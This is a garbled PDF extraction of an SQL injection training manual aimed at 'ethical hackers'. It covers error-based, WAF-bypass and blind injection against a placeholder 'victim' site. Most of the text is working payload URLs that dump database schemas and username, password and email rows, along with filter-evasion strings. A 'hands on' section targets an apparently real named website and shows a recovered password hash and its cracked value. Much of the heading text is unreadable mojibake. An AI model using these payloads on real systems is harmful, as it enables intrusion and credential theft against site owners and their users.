Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
&'()
*'()
'*+*'*'*
,*'*+
- *
*.
*+ $ *
*+ / *
$ *
*
% *
*'
*( *
-
.
!
"-
( %
.
% % % %
$
$ $ -
-
- -
^W/>/d/KE
hůƚƌĂ,ĂĐŬĞƌƐdƌĂŝŶŝŶŐ<ŝƚ
z͘ŶƚŽ
&ŽƌƚŚŝĐĂů,ĂĐŬĞƌƐĂŶĚLJďĞƌ^ĞĐƵƌŝƚLJWƌŽĨĞƐƐŝŽŶĂůƐ
ͲͲz͘ŶƚŽ
ďŽƵƚƚŚĞƵƚŚŽƌ
z͘ŶƚŽ
z͘ŶƚŽ;D/dW͕͗D/dW͗D͕
Ed͕Dd^͕DW͕ZW͕D^͕
EĂŶĚ,ͿŝƐĂǁƌŝƚĞƌ͕
,ĂĐŬĞƌ͕tĞďĚĞƐŝŐŶĞƌ͕EĞƚǁŽƌŬ
ĂĚŵŝŶŝƐƚƌĂƚŽƌ͕WŚŽŶĞĂƉƉůŝĐĂƚŝŽŶ
ĚĞǀĞůŽƉĞƌ͕EĞƚǁŽƌŬĞƐŝŐŶĞƌ͕
ŶƚĞƌƉƌŝƐĞĚŵŝŶŝƐƚƌĂƚŽƌ͕,ĂƌĚǁĂƌĞƚĞĐŚŶŝĐŝĂŶ͕LJďĞƌƐĞĐƵƌŝƚLJ
ĞdžƉĞƌƚ͕ŶŐŝŶĞĞƌŝŶŐ^ƚƵĚĞŶƚ͕DŝĐƌŽƐŽĨƚ^ƚƵĚĞŶƚWĂƌƚŶĞƌ͕/ŶƚĞů
^ŽĨƚǁĂƌĞWĂƌƚŶĞƌ͕WŚŽƚŽŐƌĂƉŚĞƌĂŶĚƚƌĂŝŶĞƌǁŚŽŚĂƐǁŽƌŬŝŶŐ
ǁŝƚŚŝŽŶŶĞƚǁŽƌŬƐŚĞŚĂƐƉƌĞǀŝŽƵƐůLJĂƚƚĞŶĚĞĚŵĂŶLJ/
/ŶƚĞƌŶĂƚŝŽŶĂůŽŶĨĞƌĞŶĐĞƐĂŶĚŶĂƚŝŽŶĂůĐŽŶĨĞƌĞŶĐĞƐĂŶĚŵŽƌĞ
ŚŝƐƌĞƐĞĂƌĐŚǁĂƐĂďŽƵƚƐĞĐƵƌŝŶŐ/d͞dŚĞďĞƐƚǁĂLJƚŽŚĂĐŬŝƐƚŚĞ
ďĞƐƚǁĂLJƚŽƐĞĐƵƌĞ͟ĂďŽƵƚŶƚŽďLJǀŝƐŝƚŝŶŐŚŝƐƚĞĐŚŶŝĐĂůďůŽŐĂƚ
ŚƚƚƉ͗ͬͬĂŶƚŽϮϬϭϬ͘ǁĞĞďůLJ͘ĐŽŵ
ǁĂƚĐŚŵŽƌĞŚĂĐŬŝŶŐŵƵůƚŝŵĞĚŝĂĐŽŶƚĞŶƚǀŝƐŝƚŚŝƐĐŚĂŶŶĞů
ŚƚƚƉ͗ͬͬǁǁǁ͘LJŽƵƚƵďĞ͘ĐŽŵͬƵŶŝǀĞƌƐŝƚLJŽĨŚĂĐŬŝŶŐ
Kƌ
ŚƚƚƉ͗ͬͬĨĂĐĞŬ͘ĐŽŵͬƵŶŝǀĞƌƐŝƚLJŽĨŚĂĐŬŝŶŐ
ŚƚƚƉ͗ͬͬǁǁǁ͘LJŽƵƚƵďĞ͘ĐŽŵͬtϭŚĂŶŶĞů
ŽŶƚĞŶƚƐĂƚĂ'ůĂŶĐĞ
,WdZϭ Kh>YhZz^^Y> ϭͲϮϭ
/E:d/KE
,WdZϮ ^Y>/E:d/KEzW^^/E't& ϮϮͲϮϵ
,WdZϯ d/D^>/E^Y>/E:d/KE ϯϬͲϯϴ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
Step1
ϭͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
SQL Command
http:// Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select
concat(database())) FROM information_schema.tables
LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
ϮͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
user info, Once the basic system info is grasped we can
move on to grabbing tables, columns, and finally extraction
of data. In order to test for additional databases we need to
first grab the count by alter the above request to:
Step2
SQL Command
http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select (SELECT
distinct concat(0x7e,0x27,count(schema_name),0x27,0x7e)
FROM information_schema.schemata LIMIT 0,1)) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x
from information_schema.tables GROUP BY x)a)
ϯͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
Now that we have the count we can alter the above to use
CONCAT and LIMIT to grab the name of each database
available.
Step3
SQL Command
http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select (SELECT
distinct concat(0x7e,0x27,cast(schema_name as
char),0x27,0x7e) FROM information_schema.schemata
LIMIT N,1)) FROM information_schema.tables LIMIT
0,1),floor(rand(0)*2))x FROM information_schema.tables
GROUP BY x)a)
ϰͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
Now you will get result like this
Step4
Once you have all the DB names you might want to find
out the current user and confirm version info as well as
some other basic stuff. It can be done using slight
variations to our original query for current database which
would look like this, notice only the call in the middle is
being altered.
SQL Command
ϱͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select
concat(version())) FROM information_schema.tables
LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
Step5
User
SQL Command
http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select concat(user()))
FROM information_schema.tables LIMIT
0,1),floor(rand(0)*2))x FROM information_schema.tables
GROUP BY x)a)
ϲͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
Now you will get result like this
Step5
DATADIR
SQL Command
http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select
concat(@@datadir)) FROM information_schema.tables
LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
ϳͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
Step6
HOSTNAME
SQL Command
http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select
concat(@@hostname)) FROM information_schema.tables
LIMIT 0,1),floor(rand(0)*2))x FROM
information_schema.tables GROUP BY x)a)
ϴͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
Step7
SQL Command
http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM
`information_schema`.tables WHERE
table_schema=<HEX_VLAUE_OF_DB_NAME>)) FROM
information_schema.tables LIMIT 0,1),floor(rand(0)*2))x
FROM information_schema.tables GROUP BY x)a)
ϵͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
Step8
SQL Command
http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select (SELECT
distinct concat(0x7e,0x27,cast(table_name as
char),0x27,0x7e) FROM information_schema.tables
WHERE table_schema=<HEX_VLAUE_OF_DB_NAME>
LIMIT 1,1)) FROM information_schema.tables LIMIT
0,1),floor(rand(0)*2))x FROM information_schema.tables
GROUP BY x)a)
ϭϬͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
Now you will get result like this
You will need to HEX the DB Name from which you are
pulling table names from or it will not be properly
processed, same is true if you are pulling columns from
tables as we will do in this next step now that we have
found some tables.
Step9
SQL Command
http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM
`information_schema`.columns WHERE
table_schema=<HEX_VLAUE_OF_DB_NAME> AND
table_name=<HEX_VLAUE_OF_TABLE_NAME>))
ϭϭͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
FROM information_schema.tables LIMIT
0,1),floor(rand(0)*2))x FROM information_schema.tables
GROUP BY x)a)
Step10
SQL Command
http://Victim.com/index.php?id=7+and(select 1
FROM(select count(*),concat((select (select (select distinct
concat(cast(column_name as char)) FROM
information_schema.columns WHERE
ϭϮͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
table_schema=<HEX_VLAUE_OF_DB_NAME> AND
table_name=<HEX_VLAUE_OF_TABLE_NAME>
LIMIT 0,1)) FROM information_schema.tables LIMIT
0,1),floor(rand(0)*2))x FROM information_schema.tables
GROUP BY x)a)
Step11
Final process
SQL Command
http://Victim.com/index.php?id=7+and+(select 1
FROM(select+count(*),concat((select+concat(0x3a,userna
me,0x3a,password,0x3a,email,0x3a) FROM
ϭϯͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
<TABLE_NAME>+LIMIT+0,1),floor(rand(0)*2))x
FROM information_schema.tables+GROUP BY x)b)
ϭϰͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
Hands on experience
Step1
First you must target any site in here am targeted
http://www.techvision.co.uk
Step2
Check the site is vulnerable or not in my case this site is
vulnerable
http://www.techvision.co.uk/news.php?id=45
ϭϱͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near ''' at line 1
Step3
Check the version of MySQL
http://www.techvision.co.uk/news.php?id=45+and+(select+
1+from(select%0Acount(*),concat((select+concat(version()
)+from+information_schema.tables+limit+0,1),floor(Rand(
0)*2))a+from+information_schema.tables+group+by+a)b)
ϭϲͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
Step4
Check the name of the database
ϭϳͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
Step5
Find the name of the table
Next step you must convert name of the table to hex value
ϭϴͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
Step6
Find the name of the column present in the table
ϭϵͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
Step7
Find the name of the column present in the table
ϮϬͮW Ă Ő Ğ
Kh>YhZz^^Y>/E:d/KE ,WdZϭ
Step7
Final step
Duplicate entry
'debandy~9679ee7b0e7ddb35b34046a7c76e6e23~1' for
key 1
9679ee7b0e7ddb35b34046a7c76e6e23 = l674300b
ϮϭͮW Ă Ő Ğ
^Y>/E:d/KEzW^^/E't& ,WdZϮ
Attacking steps
http://www.victim.com/index.php?id=777
No Errors
http://www.victim.com/index.php?id=777¶¶
Errors
ϮϮͮW Ă Ő Ğ
^Y>/E:d/KEzW^^/E't& ,WdZϮ
http://www.victim.com/index.php?id=777+ORDER+BY+1
,2,3,4,5--
No Errors
http://www.victim.com/index.php?id=777+ORDER+BY+1
,2,3,4,5,6--
Errors
http://www.victim.com/index.php?id=777+UNION+SELE
CT+1,2,3,4,5--
403 Forbidden
http://www.victim.com/index.php?id=-
777+UNION+SELECT+1,2,3,4,5--
403 Forbidden
Now we will see if we can get one past the WAF system by
using some comments to hide the parts of our statement
that our most likely being filtered.
http://www.victim.com/index.php?id=777+UNION+SELE
CT+1,2,3,4,5--
403 Forbidden
ϮϯͮW Ă Ő Ğ
^Y>/E:d/KEzW^^/E't& ,WdZϮ
http://www.victim.com/index.php?id=-
777+UNION+SELECT+1,2,3,4,5--
403 Forbidden
http://www.victim.com/index.php?id=-
777+/*!UNION*/+/*!SELECT*/+1,2,3,4,5--
No Errors
http://www.victim.com/index.php?id=-
777+/*!UNION*/+/*!SELECT*/+1,CONCAT(database(),u
ser(),version()),3,4,5--
403 Forbidden
ϮϰͮW Ă Ő Ğ
^Y>/E:d/KEzW^^/E't& ,WdZϮ
Ok, so now we have commented out our UNION SELECT
statement but something is still setting off the filters. It is
most likely the CONCAT statement. In some cases it is
possible to bypass filters by simply changing the norm up
and retesting.
http://www.victim.com/index.php?id=-
777+/*!UNION*/+/*!SELECT*/+1,ConCAt(database(),use
r(),version()),3,4,5--
No Errors
Version = 5.1.81-community
User = sample@localhost
Database() = sampled
Now you will know the current database name, user name
and the version as they are neatly displayed on the page for
us. These two techniques can be combined to evade filters
throughout your Injections as you will see. Now let us try
to get the list of all the databases available, instead of just
the current one
ϮϱͮW Ă Ő Ğ
^Y>/E:d/KEzW^^/E't& ,WdZϮ
http://www.victim.com/index.php?id=-
777+/*!UNION*/+/*!SELECT*/+1,GROUP_CONCAT(S
CHEMA_NAME),3,4,5+FROM+INFORMATION_SCHE
MA.SCHEMATA--
403 Forbidden
http://www.victim.com/index.php?id=-
777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(SCH
EMA_NAME),3,4,5+FROM+INFORMATION_SCHEM.S
CHEMATA--
No Errors
Information_Schema
sampleDB
ϮϲͮW Ă Ő Ğ
^Y>/E:d/KEzW^^/E't& ,WdZϮ
http://www.victim.com/index.php?id=-
777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TA
BLE_NAME),3,4,5+FROM+INFORMATION_SCHEM.T
ABLES+WHERE+TABLE_SCHEMA=DATABASE()--
403 Forbidden again
http://www.victim.com/index.php?id=-
777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(TA
BLE_NAME),3,4,5+FROM+/*!INFORMATION_SCHEM
*/.TABLES--
No Errors
ϮϳͮW Ă Ő Ğ
^Y>/E:d/KEzW^^/E't& ,WdZϮ
Now we have all of the tables for the current database
displayed on the page without any 403 holding us back and
convert the table name as Hex value
http://www.victim.com/index.php?id=-
777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(CO
LUMN_NAME),3,4,5+FROM+/*!INFORMATION_SCH
EM*/.COLUMNS+WHERE+TABLE_NAME=0x41646d6
96e--
No Errors
id
pwd
mailid
http://www.victim.com/index.php?id=-
777+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(id,0
x3a, pwd,0x3a,mailid,0x3a),3,4,5+FROM+Admin²
ϮϴͮW Ă Ő Ğ
^Y>/E:d/KEzW^^/E't& ,WdZϮ
Now you will get id mailid pwd etc..
/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&i
d=*/table²
/*!union*/+/*!select*/+1,2,3²
/*!UnIOn*//*!SeLect*/+1,2,3²
un/**/ion+sel/**/ect+1,2,3²
·
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T
*/1,2,3²
ϮϵͮW Ă Ő Ğ
d/D^>/E^Y>/E:d/KE ,WdZϯ
Steps to be follow
First you must target any victim for example
http://www.victim.com/index.php?id=777
ϯϬͮW Ă Ő Ğ
d/D^>/E^Y>/E:d/KE ,WdZϯ
Now you have the column count, but we will need to check
the version.
http://www.victim.com/index.php?id=777¶DQG
substring(@@version,1,1)=4--+-¶
http://www.victim.com/index.php?id=777¶DQG
substring(@@version,1,1)=5--+-¶
5.0
ϯϭͮW Ă Ő Ğ
d/D^>/E^Y>/E:d/KE ,WdZϯ
Errors
Errors
Errors
No Errors
ϯϮͮW Ă Ő Ğ
d/D^>/E^Y>/E:d/KE ,WdZϯ
Now you will be using the TRUE/FALSE results to
determine what columns are present in the table. It will
work like this:
http://www.victim.com/index.php?id=777¶DQG6(/(&7
substring(concat(1,<insert-column-guess-here>),1,1) from
<table-name> limit 0,1)=1--+-¶
No Errors
ϯϯͮW Ă Ő Ğ
d/D^>/E^Y>/E:d/KE ,WdZϯ
http://www.victim.com/index.php?id=777¶ DQG 6(/(&7
substring(concat(1,password),1,1) from admin limit 0,1)=1-
-+-
No Errors
Now that you have found the table name and associated
column names we can actually extract some data. In order
to extract you will change up our syntax slightly so that it
takes advantage of the ASCII CHAR conversion. We will
again analyze the results of based on TRUE/FALSE
responses. This part is very time consuming as we have to
get each letter at a time (in CHAR value) and then convert
it over to get the standard plain text that most people can
identify with.
http://www.victim.com/index.php?id=777¶DQG
ascii(substring((SELECT concat(username,0x3a,password)
from users where userid=1),1,1))>65
ϯϰͮW Ă Ő Ğ
d/D^>/E^Y>/E:d/KE ,WdZϯ
http://www.victim.com/index.php?id=777¶DQG
ascii(substring((SELECT concat(username,0x3a,password)
from users where userid=1),1,1))>122
http://www.victim.com/index.php?id=777¶DQG
ascii(substring((SELECT concat(username,0x3a,password)
from users where userid=1),1,1))>100
http://www.victim.com/index.php?id=777¶DQG
ascii(substring((SELECT concat(username,0x3a,password)
from users where userid=1),1,1))>115
http://www.victim.com/index.php?id=777¶DQG
ascii(substring((SELECT concat(username,0x3a,password)
from users where userid=1),1,1))>112
ϯϱͮW Ă Ő Ğ
d/D^>/E^Y>/E:d/KE ,WdZϯ
http://www.victim.com/index.php?id=777¶DQG
ascii(substring((SELECT concat(username,0x3a,password)
from users where userid=1),1,1))>113
http://www.victim.com/index.php?id=777¶DQG
ascii(substring((SELECT concat(username,0x3a,password)
from users where userid=1),1,1))>111
As you can see this can take some time. In the example
above we would use some reasoning and determine that the
char value is greater than 111, but less than 113. When we
ran the test against 112 it indicated as true thus meaning it
is greater than OR equal to 112. If we convert this we get
WKH OHWWHU ³S´ 2. VR ZH KDYH WKH ILUVW OHWWHU QRZ OHW¶V
adjust our LIMIT at the end to move on to the second
character position. We will also do our best to use our
brains to speed things up and start guessing the next logical
FKDUDFWHUWRIROORZD³S´OLNHPD\EHDQ³D´ ,WQRZ
looks like this:
ϯϲͮW Ă Ő Ğ
d/D^>/E^Y>/E:d/KE ,WdZϯ
http://www.victim.com/index.php?id=777¶DQG
ascii(substring((SELECT concat(username,0x3a,password)
from users where userid=1),2,1))>97
http://www.victim.com/index.php?id=777¶DQG
ascii(substring((SELECT concat(username,0x3a,password)
from users where userid=1),2,1))>98
http://www.victim.com/index.php?id=777¶DQG
ascii(substring((SELECT concat(username,0x3a,password)
from users where userid=1),3,1))>115
http://www.victim.com/index.php?id=777¶DQG
ascii(substring((SELECT concat(username,0x3a,password)
from users where userid=1),3,1))>116
http://www.victim.com/index.php?id=777¶DQG
ascii(substring((SELECT concat(username,0x3a,password)
from users where userid=1),4,1))>116
ϯϳͮW Ă Ő Ğ
d/D^>/E^Y>/E:d/KE ,WdZϯ
FALSE ± indicating we have gone to far and found us
DQRWKHU³V´RU
http://www.victim.com/index.php?id=777¶DQG
ascii(substring((SELECT concat(username,0x3a,password)
from users where userid=1),4,1))>115
ϯϴͮW Ă Ő Ğ
Buy your books fast and straightforward online - at one of world’s
fastest growing online book stores! Environmentally sound due to
Print-on-Demand technologies.